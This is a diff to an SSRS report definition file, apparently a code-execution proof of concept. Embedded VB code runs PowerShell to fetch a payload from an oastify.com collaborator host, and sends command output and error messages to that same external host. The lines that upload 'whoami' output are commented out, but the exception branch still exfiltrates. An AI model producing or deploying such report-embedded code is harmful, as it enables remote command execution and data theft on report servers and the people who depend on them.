--- a/untitled.rdl
+++ b/untitled.rdl
@@ -48,7 +48,8 @@
       Dim webClient As New System.Net.WebClient
       Try
         Dim p As New System.Diagnostics.Process()
-        p.StartInfo.FileName = "whoami.exe"
+        p.StartInfo.FileName = "powershell.exe"
+        p.StartInfo.Arguments = "-c \"irm http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/payload\""
         p.StartInfo.RedirectStandardOutput = True
         p.StartInfo.UseShellExecute = False
         p.StartInfo.CreateNoWindow = True
@@ -56,8 +57,8 @@
         
         Dim output As String = p.StandardOutput.ReadToEnd()
         
-        p.WaitForExit()
-        webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
+        'p.WaitForExit()
+        'webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
       Catch ex As Exception
         webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", ex.Message)
       End Try
